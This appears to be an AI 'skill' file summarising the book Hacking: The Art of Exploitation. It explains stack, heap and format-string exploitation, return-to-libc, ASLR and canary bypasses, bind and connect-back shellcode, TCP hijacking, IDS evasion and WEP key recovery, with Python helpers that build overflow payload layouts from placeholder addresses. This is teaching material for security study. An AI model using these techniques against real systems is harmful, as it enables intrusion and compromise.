Hacking: The Art of Exploitation
Low-level exploitation from first principles — C programming, x86 memory layout, buffer overflows, format strings, shellcode writing, network hacking, and countermeasure bypasses. Erickson explains the 'why' behind techniques rather than just the 'how'.
- Analyze stack frame layout to identify buffer overflow offset to return address
- Classify vulnerability type: stack overflow, heap overflow, BSS overflow, format string
- Explain format string %n write primitive and arbitrary memory write technique
- Describe shellcode requirements: position-independent, null-free, size-constrained
- Explain return-to-libc as NX/DEP bypass without shellcode
- Map OSI layers to relevant attack surface (hijacking, spoofing, ARP poisoning)
- Explain TCP/IP hijacking via sequence number prediction
- Analyze WEP FMS attack: RC4 KSA weakness and IV-based key recovery
- Describe ASLR bypass conditions: 32-bit brute force, heap spray, info leak chaining
- Apply password probability matrices vs brute force vs rainbow table tradeoffs
Install this skill and Claude can analyze stack frame layouts to calculate buffer overflow offsets, explain format string and heap exploitation mechanics, reason through shellcode constraints and countermeasure bypass strategies, and map network attacks like TCP hijacking to their underlying protocol weaknesses.
Understanding exploitation at the implementation level, not just conceptually, is the foundation of both offensive security and meaningful defense. Practitioners who can reason from first principles about memory corruption and countermeasure bypasses build better mitigations and evaluate vulnerability reports more accurately.
- Analyzing a vulnerable C program to identify the buffer overflow offset to the return address, determine NX and stack canary status, and construct a return-to-libc payload
- Reviewing shellcode for null bytes, position-dependence, or other properties that would cause it to fail in specific delivery contexts such as strcpy-based overflow exploits
- Explaining the mechanics of TCP session hijacking or ARP poisoning and identifying which defensive controls (TLS, DNSSEC, DHCP snooping) mitigate each attack
Hacking: The Art of Exploitation Skill
Core Philosophy
Hacking is creative problem solving — finding unintended uses of a system’s own rules. Security researchers must understand attacks at the implementation level to build meaningful defenses. Understanding exploitation is prerequisite to understanding how to prevent it.
The co-evolutionary model: attacking hackers find weaknesses → defending hackers build mitigations → attacking hackers develop evasion → better mitigations emerge. Understanding both sides produces smarter security.
Memory Layout Fundamentals
Process Memory Segments
High addresses
┌────────────────┐
│ Stack │ ← grows DOWN — local vars, return addresses, saved frames
│ (grows ↓) │
├────────────────┤
│ ... │
│ (grows ↑) │
│ Heap │ ← dynamic allocation (malloc/new)
├────────────────┤
│ BSS │ ← uninitialized globals
│ Data │ ← initialized globals
│ Text/Code │ ← read-only executable instructions
└────────────────┘
Low addresses
Stack Frame Layout (x86)
When a function is called:
- Arguments pushed onto stack (right to left in cdecl)
- Return address pushed (EIP saved)
- Previous frame pointer pushed (EBP saved)
- ESP moved to create space for locals
Higher addresses
┌──────────────────┐
│ arg2 │
│ arg1 │
│ return address │ ← address of the instruction after the call
│ saved EBP │ ← old base pointer
│ local var 1 │
│ local var 2 │ ← ESP points here
└──────────────────┘
Lower addresses
Key registers:
- EIP: instruction pointer — what executes next
- ESP: stack pointer — top of stack
- EBP: base pointer — reference for current frame
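As a rough illustration of the frame layout above, the distance from a local buffer to the saved return address can be estimated from the buffer's displacement below EBP. The function name and the example displacement are hypothetical, and real compilers may add alignment padding or a canary, so the result should be confirmed in a debugger.

```python
WORD = 4  # bytes per stack slot on 32-bit x86


def offset_to_return_address(buffer_ebp_displacement: int) -> int:
    """Bytes from the start of a local buffer to the saved return address.

    buffer_ebp_displacement: how far below EBP the buffer starts, e.g. 0x28
    for a buffer addressed as [ebp-0x28] in the disassembly.
    """
    if buffer_ebp_displacement <= 0:
        raise ValueError("local buffers sit below EBP, so the displacement must be positive")
    # Writing upward from the buffer first crosses the remaining locals,
    # then the saved EBP (one word), and only then the return address.
    return buffer_ebp_displacement + WORD


print(offset_to_return_address(0x28))  # 40 bytes up to EBP + 4 bytes of saved EBP = 44
```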
Exploitation Vulnerability Classes
Stack Buffer Overflow
When a fixed-size buffer on the stack is written past its end, an attacker can overwrite:
- Adjacent local variables
- Saved EBP (frame pointer)
- Saved return address ← the primary target
Exploitability check:
- Is the destination buffer on the stack?
- Is there an unbounded copy (strcpy, gets, scanf %s)?
- Can attacker control input length and content?
Classic payload structure:
[NOP sled][shellcode][padding][new_return_address → NOP sled]
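The payload structure above can be sketched as a byte layout. This is a minimal illustration, assuming a 32-bit little-endian target; the offset, the return address, and the helper name are made up, and breakpoint bytes stand in for real shellcode.

```python
import struct


def build_layout(offset, return_address, payload, sled_len=16):
    """Arrange [NOP sled][payload][padding][return address] for 32-bit x86."""
    sled = b"\x90" * sled_len  # 0x90 is the x86 NOP opcode
    body = sled + payload
    if len(body) > offset:
        raise ValueError("sled + payload do not fit before the return address")
    padding = b"A" * (offset - len(body))
    # x86 is little-endian, so the address is packed least-significant byte first.
    return body + padding + struct.pack("<I", return_address)


placeholder = b"\xcc" * 8  # int3 breakpoints stand in for real shellcode
layout = build_layout(offset=44, return_address=0xBFFFF6C0, payload=placeholder)
print(len(layout), layout[-4:].hex())
```

The return address here is assumed to point somewhere inside the sled; any address in that range slides execution into the payload, which is why a longer sled tolerates a less precise guess.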
Off-by-one errors: writing exactly one byte past the end of an array can still overwrite the null terminator of an adjacent string or the low byte of a saved pointer.
Heap Buffer Overflow
Overflows on the heap corrupt heap metadata (the prev_size and size fields in glibc’s dlmalloc-derived allocator), allowing:
- Arbitrary write primitive via free() unlink operation
- Overwriting function pointers stored on heap
- Use-after-free conditions
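The unlink write primitive can be modeled with a toy memory map. This sketch assumes the classic 32-bit chunk layout (forward pointer at offset 8, backward pointer at offset 12) and an allocator without the integrity checks that modern glibc performs; all addresses are hypothetical.

```python
FD_OFFSET = 8   # offset of the forward pointer in a free 32-bit chunk
BK_OFFSET = 12  # offset of the backward pointer


def unlink(memory: dict, chunk: int) -> None:
    """Classic unchecked unlink: FD->bk = BK; BK->fd = FD."""
    fd = memory[chunk + FD_OFFSET]
    bk = memory[chunk + BK_OFFSET]
    memory[fd + BK_OFFSET] = bk  # write 1: chosen value lands at a chosen address
    memory[bk + FD_OFFSET] = fd  # write 2: the mirror-image side effect


# Hypothetical addresses: a chunk whose fd/bk fields were overwritten by an overflow.
chunk = 0x0804A000
target = 0x0804B010  # e.g. a function pointer slot
value = 0x0804C000   # what the slot should end up containing
memory = {chunk + FD_OFFSET: target - BK_OFFSET, chunk + BK_OFFSET: value}

unlink(memory, chunk)
print(hex(memory[target]))
```

The second write is a constraint as much as a feature: it also stores into memory near `value`, so that region has to be writable for the operation to complete.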
BSS/Data Segment Overflows
Global/static variables in BSS/Data can be overflowed into adjacent variables. Often more reliable than stack overflows (no ASLR for BSS in older systems, no stack canary).
Format String Vulnerabilities
printf(user_input); // vulnerable
printf("%s", user_input); // safe
The %n format specifier writes the number of bytes printed so far to the address supplied as its argument. If the caller supplied no such argument, printf still takes the next value from where that argument would sit on the stack and writes through it as a pointer.
Capabilities:
- Read: %x or %s to read stack values
- Write: %n to write arbitrary 4-byte values to arbitrary addresses
- Arbitrary read/write: combine the %[n]$x parameter field with a controlled stack layout
Technique — writing to an address:
- Put target address in the input string (it lands on the stack)
- Use %[offset]$n to write to that address
- Control the write value via padding in the format string
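The padding step can be worked through numerically. The sketch below assumes the value is written one byte at a time with four successive %n writes to adjacent addresses, so only the low byte of the running character count matters; the function name and the minimum-width constant are illustrative assumptions.

```python
MIN_WIDTH = 8  # assumed floor: a %x conversion may print up to 8 hex digits on its own


def byte_write_paddings(value, already_printed):
    """Field widths that make the low byte of the printed-character count
    equal each byte of `value`, least-significant byte first."""
    paddings = []
    count = already_printed
    for shift in (0, 8, 16, 24):
        wanted = (value >> shift) & 0xFF
        pad = (wanted - count) % 256
        if pad < MIN_WIDTH:
            pad += 256  # wrap around once more so the width stays reliable
        paddings.append(pad)
        count += pad
    return paddings


print(byte_write_paddings(0xDDCCBBAA, already_printed=16))  # [154, 17, 17, 17]
```

Each number would become the field width of a padded conversion (for example `%154x`) placed before the corresponding %n.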
Shellcode Fundamentals
Shellcode Requirements
- Position-independent: no hardcoded addresses
- No null bytes: strcpy stops at \x00
- Small: must fit in available buffer space
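Two of these requirements, null-free and size-constrained, are easy to check mechanically. The helper names below are hypothetical, and the sample bytes are just two encodings of "load 0x0b into EAX", not complete shellcode.

```python
def find_bad_bytes(code: bytes, bad: bytes = b"\x00"):
    """Return (offset, byte) pairs for every byte that the delivery path would mangle."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


def fits(code: bytes, available: int) -> bool:
    """True when the code fits in the space available before the return address."""
    return len(code) <= available


with_nulls = b"\xb8\x0b\x00\x00\x00"  # mov eax, 0xb   (32-bit immediate carries nulls)
null_free = b"\x31\xc0\xb0\x0b"       # xor eax, eax ; mov al, 0xb

print(find_bad_bytes(with_nulls))  # [(2, 0), (3, 0), (4, 0)]
print(find_bad_bytes(null_free))   # []
```

Other delivery paths have their own bad bytes (for instance newline for line-based input), which is why `bad` is a parameter rather than a constant.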
Shell-Spawning Shellcode (x86 Linux)
Uses execve syscall (int 0x80) with:
- EAX = 0x0b (execve syscall number)
- EBX = pointer to “/bin/sh” string
- ECX = pointer to argv array
- EDX = pointer to envp (NULL)
Key technique: use call instruction to get address of “/bin/sh” string onto stack (the call pushes EIP, which points past the call to the string data).
Port-Binding Shellcode
Creates a socket, binds it to a port, listens, accepts a connection, duplicates the socket fd onto stdin/stdout/stderr with dup2(), then calls execve on /bin/sh. This gives a remote shell on the target machine.
Connect-Back Shellcode
Connects back to attacker’s IP:port using socket + connect syscalls, then dup2 + execve. Bypasses firewalls that block inbound connections.
Network Layer Knowledge
OSI Model for Security Analysis
7 Application ← HTTP, FTP, SSH — protocol vulns here
6 Presentation ← encoding/encryption issues
5 Session ← session hijacking
4 Transport ← TCP/UDP — SYN floods, TCP hijacking
3 Network ← IP — spoofing, routing attacks
2 Data Link ← ARP — ARP poisoning
1 Physical ← physical access
TCP/IP Hijacking
- Sniff a TCP connection (get seq/ack numbers)
- Wait for silence (no data flowing)
- Inject packet with correct seq/ack numbers and spoofed source IP
- The server accepts it as legitimate traffic from the original client
Prevention: encrypted transport (TLS/SSH) makes hijacking useless even if sequence numbers are guessed.
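The "correct seq/ack numbers" in the injection step follow from simple arithmetic on the last sniffed packet. This sketch assumes the sniffed packet is a data segment travelling from server to client and that nothing else is sent in between; the function name is hypothetical.

```python
MOD = 2 ** 32  # TCP sequence numbers are 32-bit and wrap around


def spoofed_fields(server_seq, server_ack, server_payload_len):
    """Sequence and acknowledgment numbers for a packet forged as the client.

    The server's ack is the next byte it expects from the client, and the
    client would acknowledge everything the server has sent so far.
    """
    seq = server_ack % MOD
    ack = (server_seq + server_payload_len) % MOD
    return seq, ack


print(spoofed_fields(server_seq=1000, server_ack=5000, server_payload_len=20))  # (5000, 1020)
```

SYN and FIN segments each consume one sequence number as well, so a fuller model would add one for those flags.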
Port Scanning Technique (SYN scan)
Send SYN packets; analyze responses:
- SYN-ACK → port open
- RST → port closed
- No response → filtered
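The response analysis reduces to a small decision function over the TCP flags byte. The sketch covers only the classification step, with `None` standing for a timeout; sending and capturing packets is left out, and the function name is an assumption.

```python
SYN, RST, ACK = 0x02, 0x04, 0x10  # TCP header flag bits


def classify_port(response_flags):
    """Map the flags of the reply to a SYN probe onto a port state."""
    if response_flags is None:
        return "filtered"  # no reply before the timeout
    if response_flags & RST:
        return "closed"
    if (response_flags & SYN) and (response_flags & ACK):
        return "open"
    return "unknown"


for flags in (SYN | ACK, RST | ACK, None):
    print(flags, classify_port(flags))
```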
Countermeasures and Bypass Techniques
Nonexecutable Stack (NX/DEP)
What it does: marks stack pages with the NX (No-Execute) bit; shellcode on the stack triggers a fault.
Bypass — Return-to-libc:
Instead of jumping to shellcode, overwrite return address with address of system() in libc, with “/bin/sh” as the argument on the stack. No shellcode needed.
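The stack arrangement for this bypass can be sketched as three words placed where the return address used to be. All addresses below are hypothetical placeholders, the helper name is made up, and the layout assumes the 32-bit cdecl convention, where a function finds its own return address on top of the stack followed by its first argument.

```python
import struct


def ret2libc_layout(offset, system_addr, return_after_addr, binsh_addr):
    """[padding][&system][return address for system][pointer to "/bin/sh"]."""
    frame = struct.pack("<III", system_addr, return_after_addr, binsh_addr)
    return b"A" * offset + frame


layout = ret2libc_layout(
    offset=44,
    system_addr=0xB7E53DA0,        # hypothetical address of system()
    return_after_addr=0xB7E479D0,  # hypothetical address of exit(), for a clean return
    binsh_addr=0xB7F7482B,         # hypothetical address of a "/bin/sh" string
)
print(len(layout), layout[44:48].hex())
```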
Address Space Layout Randomization (ASLR)
What it does: randomizes base addresses of stack, heap, libraries.
Bypass conditions:
- 32-bit systems: only ~16 bits of entropy for stack, brute-forceable
- Heap spray: allocate large blocks of NOP+shellcode, increases hit probability
- Info leak: find a read primitive to leak addresses first, then calculate offsets
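The brute-force condition can be quantified. The sketch below assumes each attempt faces an independently re-randomized layout with uniformly distributed bases, which is a simplification; the function names are illustrative.

```python
import math


def success_probability(entropy_bits, attempts):
    """Chance that at least one of `attempts` independent guesses is right."""
    p = 2.0 ** -entropy_bits
    return 1.0 - (1.0 - p) ** attempts


def attempts_for(entropy_bits, target_probability):
    """Smallest number of attempts that reaches the target success probability."""
    p = 2.0 ** -entropy_bits
    return math.ceil(math.log(1.0 - target_probability) / math.log(1.0 - p))


print(round(success_probability(16, 65536), 3))  # 0.632
print(attempts_for(16, 0.5))
```

With 16 bits of entropy, tens of thousands of attempts give even odds, which is practical against a service that restarts after each crash; every extra bit of entropy doubles the work.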
Stack Canaries
What they do: place a random value between the local variables and the saved frame pointer and return address; the value is checked before the function returns.
Bypass conditions:
- Format string read can leak the canary value
- Heap overflows bypass the canary entirely
- Off-by-one that only corrupts EBP (some implementations)
IDS Evasion
- Fragment packets below IDS reassembly threshold
- Send out-of-order fragments (IDS may not handle overlap correctly)
- Use shellcode encodings/stubs that decode at runtime
- Use polymorphic shellcode (different bytes, same behavior)
Cryptography Fundamentals
Symmetric vs Asymmetric
| | Symmetric | Asymmetric |
|---|---|---|
| Keys | One shared secret | Public/private pair |
| Speed | Fast | Slow |
| Problem | Key distribution | Computationally expensive |
| Use | Bulk data | Key exchange + signatures |
Hybrid ciphers (TLS, PGP): use asymmetric to exchange a symmetric session key, then symmetric for data.
Password Cracking Approaches
- Dictionary attack: try known words and variants
- Brute force: exhaustive — infeasible for long passwords
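- Probability matrix: a time-memory tradeoff that precomputes a compact matrix correlating parts of hash values with parts of plaintexts, so that only a small fraction of the keyspace has to be brute-forced per hash (like other precomputed tables, defeated by salt)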
- Rainbow tables: precomputed hash→password mappings (defeated by salt)
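Why salt defeats precomputation can be shown with a plain lookup table standing in for a rainbow table. SHA-256 and the three-word list are assumptions chosen for brevity; real password storage would use a deliberately slow key-derivation function.

```python
import hashlib


def hash_password(password: bytes, salt: bytes = b"") -> str:
    """Hex digest of salt || password (illustrative scheme only)."""
    return hashlib.sha256(salt + password).hexdigest()


# Precomputed hash -> password table, built once without knowledge of any salt.
wordlist = [b"password", b"letmein", b"hunter2"]
table = {hash_password(word): word for word in wordlist}

unsalted = hash_password(b"hunter2")
salted = hash_password(b"hunter2", salt=b"\x9f\x1c\x03\x77")

print(table.get(unsalted))  # b'hunter2'
print(table.get(salted))    # None
```

A per-user salt forces the attacker to rebuild the table for every salt value, which removes the benefit of precomputing at all.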
WEP Weakness (FMS Attack)
WEP uses RC4 with a weak key scheduling algorithm (KSA). When an IV starting with (A+3, 255, X) is used:
- The first byte of the keystream output reveals information about key byte A
- With 4–6 million packets, enough weak IVs accumulate to reconstruct the key
Lesson: IV reuse + weak KSA = statistical key recovery. Never design stream ciphers with predictable, small IVs.
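For reference, RC4 itself is short enough to write out, along with a check for the weak IV form described above. This is a sketch for study rather than a key-recovery tool: the function names are hypothetical, and the per-packet key is assumed to be the 3-byte IV followed by the shared secret.

```python
def rc4_ksa(key: bytes):
    """Key scheduling algorithm: permute S under control of the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Run the KSA, then the output generator for `length` bytes."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def wep_packet_key(iv: bytes, secret: bytes) -> bytes:
    """WEP seeds RC4 with the public IV followed by the shared secret."""
    return iv + secret


def is_fms_weak_iv(iv: bytes, key_byte_index: int) -> bool:
    """True for IVs of the form (A+3, 255, X) targeting secret key byte A."""
    return iv[0] == key_byte_index + 3 and iv[1] == 255


print(is_fms_weak_iv(bytes([3, 255, 7]), key_byte_index=0))  # True
```

Because the IV travels in the clear, an observer knows the first three bytes of every RC4 key, which is what lets the early KSA steps be reasoned about.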
Debugging for Exploitation
GDB Commands for Exploit Development
info registers # dump all register values
x/20x $esp # examine 20 words at ESP in hex
x/s <address> # examine as string
break *<address> # breakpoint at exact address
run $(python3 -c 'print("A"*100)') # pass generated input
disassemble <function> # show disassembly
Finding Buffer Offset to Return Address
- Generate a De Bruijn sequence (unique 4-byte patterns at every position)
- Run program, let it crash
- EIP contains a unique 4-byte sequence
- Look up position in the De Bruijn sequence → that’s the offset
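The steps above can be sketched as a pattern generator plus a lookup. This is a minimal version using the standard Lyndon-word construction over lowercase letters; the function names are assumptions, and the lookup assumes a 32-bit little-endian EIP value.

```python
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase.encode()


def de_bruijn(k, n):
    """Lazily yield symbol indices of a De Bruijn sequence B(k, n)."""
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                yield from a[1:p + 1]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the sequence; every n-byte window is unique."""
    indices = itertools.islice(de_bruijn(len(ALPHABET), n), length)
    return bytes(ALPHABET[i] for i in indices)


def find_offset(eip_value, length):
    """Offset of the 4 bytes that ended up in EIP, or -1 if not found."""
    return cyclic(length).find(struct.pack("<I", eip_value))


pattern = cyclic(200)
crashed_eip = struct.unpack("<I", pattern[44:48])[0]  # simulate a crash at offset 44
print(find_offset(crashed_eip, 200))  # 44
```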
Finding the Right Return Address
- On vulnerable local binary: use GDB to find ESP at the overflow point
- On remote target: estimate based on binary info, use NOP sled to increase margin
- For ret-to-libc: ldd binary | grep libc, then nm -D libc.so | grep ' system'
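The two command outputs combine into an absolute address by adding the symbol's offset to the library's load base. The sample lines below are hypothetical values in the usual ldd and nm output shapes, and the base address is only stable when ASLR is disabled.

```python
import re


def parse_ldd_base(ldd_line: str) -> int:
    """Extract the load address printed in parentheses at the end of an ldd line."""
    match = re.search(r"\((0x[0-9a-fA-F]+)\)", ldd_line)
    if match is None:
        raise ValueError("no load address found in ldd output")
    return int(match.group(1), 16)


def parse_nm_offset(nm_line: str) -> int:
    """The first column of nm -D output is the symbol's offset in hex."""
    return int(nm_line.split()[0], 16)


# Hypothetical sample output, not taken from a real system.
ldd_line = "libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)"
nm_line = "0003ada0 W system"

system_addr = (parse_ldd_base(ldd_line) + parse_nm_offset(nm_line)) & 0xFFFFFFFF
print(hex(system_addr))  # 0xb7e53da0
```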